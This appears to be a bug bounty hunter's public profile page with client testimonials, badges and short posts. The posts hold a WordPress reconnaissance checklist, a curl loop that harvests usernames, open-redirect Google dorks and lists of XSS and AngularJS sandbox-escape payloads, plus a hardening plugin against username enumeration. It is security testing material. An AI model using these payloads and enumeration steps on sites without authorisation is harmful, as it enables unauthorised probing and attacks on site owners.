My Profile | MiguelSantareno
Public work and profiles: https://miguelsantareno.github.io/ https://hackerone.com/miguel_santareno https://www.intigriti.com/profile/miguelsantareno https://yeswehack.com/hunters/miguelsantareno https://bugcrowd.com/MiguelSantareno
Recommendations and Acknowledgements
Miguel Santareno made us aware of several security vulnerabilities across several sections of our platform that needed to be rectified due to them being a security risk. It was a pleasure working with him and I hope we can work again in the future. Thank you!
Thanks to Miguel, who reported an XSS vulnerability in one of our websites. Excellent service. The problem is now solved and tested. Great help, many thanks.
Miguel showed us several information disclosure issues with our site. Thank you very much Miguel!
Miguel helped us to identify several bugs in our WordPress instances. His reports were sufficiently detailed and communication was flawless and fast. Thank you very much!
Miguel found an important security issue in our webpage and sent us very good information about solutions. Thanks a lot.
Miguel found an issue in our WordPress site and was quick to report it. Thank you.
Miguel has found an XSS vulnerability in our search page. The example he gave helped to test our fix. Thank you!
I would like to thank Miguel for identifying the security issue, providing all relevant information to enable a fix to be deployed and confirming the resolution. Incredibly useful to get his input on the issue, and his very helpful steps to reproduce were appreciated. Very helpful and friendly.
Identified an XSS vulnerability on our website and was very friendly and supportive! Many thanks.
Identified an XSS vulnerability in one website and showed us where it is. After that, made changes in the code to solve it. All solved. Great help, great support.
Honor Badges
Number of Secured Websites: 10+ Websites, 50+ Websites, 500+ Websites, WEB SECURITY VETERAN (1000+ Websites)
Advanced Security Research: WAF Bypasser, CSRF Master (30+ Reports), AppSec Logic Master (30+ Reports), Fastest Fix (Fix in 24 hours)
Outstanding Achievements: Secured OBB, OBB Advocate, Improved OBB
Commitment to Remediate and Patch: Patch Master (55% Patched), Patch Guru (65% Patched), Patch Lord (75% Patched)
Recommendations and Recognition: REPUTABLE (10+ Recommends), FAMOUS (25+ Recommends), GLOBALLY TRUSTED (50+ Recommends)
Distinguished Blog Author: 1 Post, 3 Posts, 5+ Posts
Research Statistics
Total reports: 1450
Total reports on VIP sites: 97
Total patched vulnerabilities: 1142
Recommendations received: 20
Active since: 20.06.2017
05.09.2019 WordPress basic auditing
WordPress readme:
target/readme.html
WordPress license (discloses the WordPress version):
target/license.txt
WordPress sample config:
target/wp-config-sample.php
WordPress installation:
target/wp-admin/install.php
WordPress upgrade file:
target/wp-admin/upgrade.php
WordPress setup config:
target/wp-admin/setup-config.php
WordPress API useful paths:
target/wp-json/wp/v2/users - enumerate users
target/wp-json/wp/v2/posts - enumerate posts
target/wp-json - WordPress API
Script to check whether a site leaks usernames through its author pages (each ?author=N request either redirects to /author/<username>/, which shows up in the Location header, or renders a "View all posts by <username>" link; the original loop never passed $i into the URL and its character class contained an invalid range, both fixed here):
for i in {1..30}; do curl -s -L -i "target/?author=$i" | grep -E -o "\" title=\"View all posts by [a-zA-Z0-9.-]+|Location:.*" | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done
WordPress plugin readme or license:
target/wp-content/plugins/PLUGIN-NAME/readme.txt or license.txt
WordPress theme readme, changelog or license:
target/wp-content/themes/THEME-NAME/readme.txt, changelog.txt or license.txt
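The two username leaks listed above (the ?author=N redirect and the public wp-json/wp/v2/users listing) can be closed on the WordPress side. The following must-use plugin is an added hardening example written for this page, not code from the post or from Miguel; it assumes it is saved as wp-content/mu-plugins/block-user-enum.php and uses only WordPress core hooks. The static files listed above (readme.html, license.txt, wp-config-sample.php) are best deleted or denied at the web server, which a plugin cannot do.

```php
<?php
/**
 * Plugin Name: Block username enumeration (added hardening example)
 *
 * Assumed location: wp-content/mu-plugins/block-user-enum.php, so that
 * WordPress loads it automatically. Only core hooks are used. The theme's
 * "View all posts by <user>" links are template output and are not touched.
 */

// 1. Unauthenticated ?author=N (or /author/<name>/) requests get a plain 404.
//    Priority 1 runs before redirect_canonical (priority 10), which is what
//    would otherwise emit the revealing "Location: /author/<username>/" header.
add_action('template_redirect', function () {
    if (is_user_logged_in() || !is_author()) {
        return;
    }
    status_header(404);
    nocache_headers();
    $template = get_404_template();   // '' if the theme ships no 404.php
    if ($template) {
        include $template;
    }
    exit;
}, 1);

// 2. Hide the REST user routes from anonymous callers. With the routes
//    removed, /wp-json/wp/v2/users answers rest_no_route (HTTP 404) instead
//    of a JSON list of accounts; logged-in users (editors, the block editor)
//    keep the endpoint. Cookie/nonce authentication has already run by the
//    time rest_endpoints fires, so is_user_logged_in() is reliable here.
add_filter('rest_endpoints', function (array $endpoints) {
    if (is_user_logged_in()) {
        return $endpoints;
    }
    foreach (array_keys($endpoints) as $route) {
        if (strpos($route, '/wp/v2/users') === 0) {
            unset($endpoints[$route]);
        }
    }
    return $endpoints;
});
```

After installing it, re-run the loop above against your own site: no Location header pointing at /author/<username>/ should appear, and wp-json/wp/v2/users should return a rest_no_route error to an anonymous client.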
05.09.2019 Payloads for all types of web attacks
02.04.2019 Google Dorks to find open redirects:
inurl:url=https
inurl:url=http
inurl:u=https
inurl:u=http
inurl:redirect?https
inurl:redirect?http
inurl:redirect=https
inurl:redirect=http
inurl:link=http
inurl:link=https
02.04.2019 Cross-site scripting AngularJS payloads, by affected version range and author:
Versions 1.0.1 - 1.1.5 (Mario Heiderich, Cure53):
{{constructor.constructor('alert(1)')()}}
Versions 1.2.0 - 1.2.1 (Jan Horn, Google):
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
30.03.2019 List of basic cross-site scripting payloads:
"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"--!><img src=x onerror=alert("OPENBUGBOUNTY")>
'"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"><script>alert("OPENBUGBOUNTY")</script>
'"><script>confirm("OPENBUGBOUNTY")</script>
'"><script>prompt("OPENBUGBOUNTY")</script>
'"><svg/onload=alert(/OPENBUGBOUNTY/)>
'"><svg/onload=confirm(/OPENBUGBOUNTY/)>
'"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'>"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<svg/onload=prompt(/OPENBUGBOUNTY/)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert("OPENBUGBOUNTY")//>\x3exss.txt
'"><svg/onload=prompt`1`>
'"><svg/onload=alert`1`>
'"><svg/onload=confirm`1`>
'"><script>alert`1`</script>
><script>alert`1`</script>
'"><svg onload=prompt`openbugbounty`>
'"><svg onload=alert`openbugbounty`>
'"><svg onload=confirm`openbugbounty`>
<!'/*!"/*!/'/*/"/*--!><Input/Autofocus/*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>/
'"><svg/onload=alert(/openbugbounty/)>